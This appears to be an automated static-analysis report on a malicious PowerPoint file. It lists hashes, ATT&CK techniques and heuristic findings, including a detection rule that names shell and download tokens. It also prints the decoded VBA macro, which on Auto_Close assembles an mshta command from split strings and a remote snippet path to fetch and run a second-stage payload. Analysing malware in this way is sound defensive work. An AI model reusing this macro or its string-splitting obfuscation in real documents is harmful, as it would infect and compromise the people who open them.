Malicious Office (OLE) / .PPT — malware analysis report

Static analysis result for SHA-256 6952750e2b248cb0…

MALICIOUS

Office (OLE) / .PPT

88.0 KB Created: 2022-08-07 22:15:56 Authoring application: Microsoft Office PowerPoint First seen: 2026-05-13
MD5: efa5a55ed027ab21d30fd82082754f6a SHA-1: 020c5601a43beb6d9b54efa78c05e4154e60173c SHA-256: 6952750e2b248cb0cac7f33e2d81061f8d2635919feac3ad299a873389b3d880
68 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample is a PowerPoint file containing VBA macros. The Auto_Close macro is designed to execute a shell command. This command is constructed by concatenating strings from various objects, ultimately forming a URL that likely points to a second-stage payload. The script's intent is to download and execute this payload.

Heuristics 3

  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Auto_Close macro low OLE_VBA_AUTOCLOSE
    Auto_Close macro
    Matched line in script
    Function Auto_Close()

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2140 bytes
SHA-256: 471735d407db733fb3cecaf995d91e56dbe263637e4542ddf8a13706e5ac9b50
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "score"
Function Auto_Close()
Dim hi As New textfile
Dim Opera As New najma
Dim textfileforyou As New modern

textfilestuffonly = Opera.X + Opera.Y + textfileforyou.Z + textfileforyou.D + hi.openmarket + hi.XXX + hi.K + hi.T
MsgBox "Error!!!": Call Shell!(textfilestuffonly)

End Function


Attribute VB_Name = "textfile"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function openmarket() As String
openmarket = textfilestuff.mosuf.Tag

End Function
Function XXX() As String
XXX = textfilestuff.Tag
End Function
Function K() As String
K = textfilestuff.stuff.Tag
End Function
Function T() As String
T = "/!api/2.0/snippets/warzonepro/KME7g4/7678df565d5a8824274645a03590fc72588243f0/files/orignalfinal"
End Function





Attribute VB_Name = "najma"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function X() As String
X = "M"
End Function
Function Y() As String
Y = "s"
End Function



Attribute VB_Name = "textfilestuff"
Attribute VB_Base = "0{66F7F502-E35A-4F4A-956F-12A65DC64BC6}{98E14456-6E91-4866-889F-E1E34742E4B0}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "modern"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function Z() As String
Z = "H"
End Function
Function D() As String
D = "T"
End Function